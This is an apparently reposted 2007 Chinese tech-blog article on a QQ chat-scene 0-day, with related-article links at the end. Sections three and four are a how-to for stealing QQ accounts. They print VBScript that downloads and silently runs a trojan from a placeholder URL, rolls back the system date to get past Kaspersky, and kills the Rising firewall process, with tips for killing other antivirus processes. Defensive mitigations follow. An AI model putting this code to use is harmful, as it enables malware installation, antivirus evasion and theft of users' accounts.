惊!QQ新漏洞 腾讯3亿用户遭受威胁

原创 2007年10月12日 17:20:00

根据易观国际发布《2007年第2季度中国即时通讯市场季度监测》报告显示,中国活跃的IM软件账号已经

达到了3.76亿个,其中拥有2.9亿活跃用户账号的腾讯QQ是当之无愧的IM王者。可是你知道吗,你的QQ现在很危

险了!

  不需要什么高超的技巧,黑客就可以轻松地盗取你的QQ。想知道他们是怎么做的以及该如何避免自己的QQ

被盗吗?快随小编一起看看QQ场景漏洞的破解之法(属于0DAY漏洞)。

  月黑风高夜,黑客挖出了一个宝箱,里面盛放着光彩夺目的“QQ场景漏洞”。他们惊奇的发现,不需要有

什么高超的技巧,只要懂一点基本的脚本代码编写,就可以轻松地盗取别人的QQ、秘密安装监控软件或破坏系

统等。于是,地狱之门就被打开了,所有的QQ用户都被恐惧笼罩着。

  一、QQ场景漏洞的利用原理解析

  聊天场景是QQ软件中的一项基本功能,可以让聊天的双方使用同样的场景,从而拉近聊天用户之间的距离

。不过最新的QQ场景漏洞,可能会让大家的QQ有被盗的风险。

  该漏洞的利用原理很简单,攻击者向其QQ列表内的用户发送一个恶意构造的场景,场景里面包括图片文件

、VBScript.qqs文件和Config.qqs文件,其中VBScript.qqs文件就是编写恶意代码的地方,然后在远程系统中

执行即可。

  二、QQ场景漏洞的危害有多大

  QQ场景漏洞的危害到底多大?重则可能系统崩溃,资料消失;轻则可能QQ被盗,这些后果都是很严重的。更

可怕的是,漏洞的利用方法特别简单,不需要什么操作即可实现,会成为大量手痒的菜鸟黑客们的最爱。

  添加的脚本代码的作用不同,造成的危害性也会不同。比如,如果是一段文件下载脚本代码的话,那么代

码就会自动下载设置的文件并默默地运行。如果下载的是木马后门程序的话,黑客就可以通过木马进行远程控

制。如果是一段格式化代码的话,那么磁盘中的文件就会瞬间被清除掉。

  小提示:QQ场景漏洞的危害程度判断是参考了标准的次高危害漏洞(百度搜霸远程执行漏洞)和标准的中等

危害漏洞(WMP AU文件除零漏洞)。

三、试用QQ场景漏洞

  首先,将QQ场景漏洞所需的场景文件下载到本地系统,解压后复制到系统中QQ的安装目录X:/Program

Files/Tencent/QQ下面,这样在Scene文件夹中就多了一个场景目录。现在我们就可以进行测试操作,不过为了

弹出窗口更加有个性化,我们要对场景目录真的脚本文件进行修改。

  接着,用文本编辑器打开其中的VBScript.qqs文件,在文件代码中找到MsgBox这个消息函数,该函数后面

跟着的就是该场景在执行后弹出的信息内容,这里我们可以将它设置为自己需要弹出的内容信息,比如设置为

“电脑报,我的最爱!”。如果你熟悉VBS脚本,可以设置更有个性的语句。

  然后,随便在QQ联系人列表中找一个人,无论对方使用的是QQ还是TM都可以,双击打开其聊天窗口。然后

点击工具栏中的“选择音乐场景”按钮,在弹出的窗口中选择打开“我的场景”标签,并且找到一个和场景目

录名称相同的场景。这样这个带有VBS脚本的场景,就会自动的下载到远程好友的QQ 中并运行。

  四、如何利用QQ场景漏洞盗QQ

  漏洞用熟后,就可以开始盗QQ了。首选下载该漏洞的利用代码,然后进行简单的修改即可。下面就对代码

的关键部分进行讲解。

  iLocal = LCase("c:/mm.exe"):iRemote = LCase("http://www.****.com/mygim.exe")

  代码作用是将文件下载到磁盘中指定的位置,我们只需要把其中的http://www.****.com/mygim.exe改为自

己的木马地址即可。

  Set ws = CreateObject("Wscript.Shell")

  ws.run "cmd /c set date=%date% &&date 1988-1-1 &&ping -n 30 127.0.0.1&&date %date%",vbhide

  for each ps in getobject("winmgmts://./root/cimv2:win32_proCESs").instances_

  if ps.Name="rfwsrv.exe" then

  ws.run "ntsd -c q -p ps.handle",0

  这段代码主要有两个作用,首先是通过修改系统的时间,从而让下载的木马程序躲过卡巴斯基的主动防御

功能。接着用于检测系统中是否存在瑞星防火墙,如果存在的话就结束该防火墙的进程。

  当然我们可以依葫芦画瓢来添加结束其他进程的代码,比如要结束金山网镖的进程,只需要将代码if

ps.Name="rfwsrv.exe" Then 中的rfwsrv.exe,替换为金山网镖的进程名称KPFW32.exe即可。经过这一系列的

处理以后,盗号木马就能成功的获取远程用户的QQ号码,并且最终发送到我们指定的信箱里面呢。

五、QQ场景漏洞的防范措施

  由于QQ场景漏洞是一个全新的0DAY漏洞,因此现在还没有现成的安全补丁可以使用,所以只能临时用其他

的方法来进行相关的防范。有的人说TM没有聊天场景,因此可以利用TM来代替QQ,但是经过我们的测试发现TM

依然受到该漏洞的影响。

  同样在联系人列表中任意的选择一位,接着点击工具栏中的“选择音乐场景”按钮,然后在“我的场景”

标签中点击“在我的场景设置”按钮。现在只需要在弹出的窗口里面把“接受场景邀请”前面的勾去掉就可以

啦。除此以外,还可以选择Scene目录的属性选项,将它的属性设置为只读即可。

  如果用户已经不信“中标”的话,那么现在还有两种方法可以解决。第一在“我的场景”标签里,选择“

不使用场景”选项就可以。另外可以直接到QQ目录中的Scene文件夹,将它中的所有内容彻底删除,就可以完全

避免以前的漏洞场景被重新激活。

  六、QQ场景漏洞的预防方案

  由于QQ场景漏洞是通过恶意脚本来进行操作的,因此要预防漏洞的方法就是防止非法的聊天场景写入系统

磁盘。

  我们可以通过一款名为《系统安全盾》的安全软件进行防范,该程序不但可以对设置的文件夹进行有效的

监控,还可以对非法运行的程序进行有效的拦截操作,这样就从多个方面对系统安全进行保护,并且该程序的

自身保护能力也非常的强,只有在正确的输入了确认码后才会弹出,有效的防止程序进程被恶意代码非法结束

  《系统安全盾》运行后,点击程序主界面中“监控设置”菜单中的“监控设置调整”命令。程序在默认的

情况下,是无法将文件添加到系统目录的。为了更好的监控下载的聊天场景,我们点击鼠标右键来新增项目,

双击新增的项目来设置新的监控路径,然后将项目内容都选择√选项。

  接着再在“文件黑名单”选项里面,将聊天场景中主要的VBScript.qqs文件添加到黑名单,更改配置后一

定要点击“应用设置”按钮进行保存。这样当程序检测到这些可疑文件后,就会立即的进行拦截操作并提示用

户。 

余额宝遭盗频发 再曝支付宝安全漏洞

前不久,一则《余额宝被盗刷6万多元支付宝让失主“耐心等待”》的新闻引发了笔者的密切关注,不仅仅因为笔者也是余额宝的用户,更重要的一点,这则事件可能折射出支付宝在安全上所存在的某些漏洞,如果这些漏洞确实...
  • feitianhanxue
  • feitianhanxue
  • 2014年01月09日 09:53
  • 2587

QQ游戏百万人同时在线服务器架构实现

QQ游戏于前几日终于突破了百万人同时在线的关口,向着更为远大的目标迈进,这让其它众多传统的棋牌休闲游戏平台黯然失色,相比之下,联众似乎已经根本不是QQ的对手,因为QQ除了这100万的游戏在线人数外,它...
  • Jsen_1984
  • Jsen_1984
  • 2016年01月02日 23:34
  • 4001

企业QQ空间xss随意得客户端QQ号码 附(爆破盗号者后台)

简要描述: 被忽视的企业QQ空间新闻存储型xss漏洞 http://www.wooyun.org/bugs/wooyun-2010-042657 随意盗取指定客户端QQ号码cookis通杀抓取 随...
  • qq_27446553
  • qq_27446553
  • 2017年04月23日 09:48
  • 523

来自腾讯的高性能服务器架构思路

在服务器端程序开发领域,性能问题一直是备受关注的重点。业界有大量的框架、组件、类库都是以性能为卖点而广为人知。然而,服务器端程序在性能问题上应该有何种基本思路,这个却很少被这些项目的文档提及。本文正式...
  • u010528747
  • u010528747
  • 2017年01月13日 19:14
  • 1157

一封伪造邮件引发的“探索”(涉及钓鱼邮件、SPF和DKIM等)

0×00. 引言 我用swaks 发送一封以我们公司CTO为显示发件人(腾讯企业邮箱)的伪造邮件给我的一个同事,邮件的内容就是让这位同事去CTO的办公司一趟,没想到这位同事真的去了,然后一脸懵逼的回...
  • qq_27446553
  • qq_27446553
  • 2017年07月08日 02:19
  • 638

腾讯界面库初探

腾讯新产品线:QQ2009, QQ 旋风2,QQ影音等都使用了非常漂亮的界面。一直以为是自己写的,毕竟QQ2009需要一个安全的环境以避免外挂的衍生。经过spy++探测,发现一个TXGuiFounda...
  • zxxSsdsd
  • zxxSsdsd
  • 2013年12月11日 18:48
  • 1598

腾讯QQ企业邮箱POP3/SMTP设置

腾讯企业邮箱支持通过客户端进行邮件管理。 POP3/SMTP协议 收发邮件服务器地址分别如下。 接收邮件服务器:pop.exmail.qq.com (端口 110) 发送邮件服务器:smtp....
  • china_skag
  • china_skag
  • 2013年01月20日 10:48
  • 35124

高仿腾讯QQ即时通讯IM项目

前言:其实这个项目早就开发完成了,在本人的github上,本来没打算写成博客的形式,因为一个项目要写出来要花很久,但是最近看到很多 人在我的github上download后随意发布到网上,本来上传到g...
  • htq__
  • htq__
  • 2016年07月06日 16:59
  • 68697

腾讯拦截网站解决方案

被误报,那么解除拦截很简单,只要向QQ安全中心(aq.qq.com)申诉,说明理由即可,大概一周内便可解除拦截。PS我还不知道qq安全中心哪里可以申述 如果多次申诉都没有收到QQ安全中心的回复,...
  • xxmxj
  • xxmxj
  • 2017年04月23日 09:43
  • 1238

关于腾讯玄武实验室公布的应用克隆漏洞的一些思考

2018-01-09 国家信息安全漏洞共享平台 公布了 《关于Android平台WebView控件存在跨域访问高危漏洞的安全公告》 另外,关于该漏洞的原理 这里 有个补充说明: 从上文中...
  • niuzhucedenglu
  • niuzhucedenglu
  • 2018年01月12日 13:03
  • 524
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:惊!QQ新漏洞 腾讯3亿用户遭受威胁
举报原因:
原因补充:

(最多只允许输入30个字)